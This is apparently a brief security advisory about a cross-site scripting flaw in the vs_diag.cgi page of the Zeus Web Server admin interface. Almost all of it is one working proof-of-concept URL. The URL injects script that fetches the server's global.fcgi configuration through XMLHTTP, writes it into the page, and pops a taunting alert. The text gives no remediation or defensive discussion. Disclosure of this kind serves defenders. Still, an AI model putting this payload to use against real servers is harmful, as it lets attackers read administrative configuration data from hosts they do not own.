Zeus Web Server Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability

Zeus Web Server Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability

The following proof of concept was provided:

http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo()
{var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")
</script>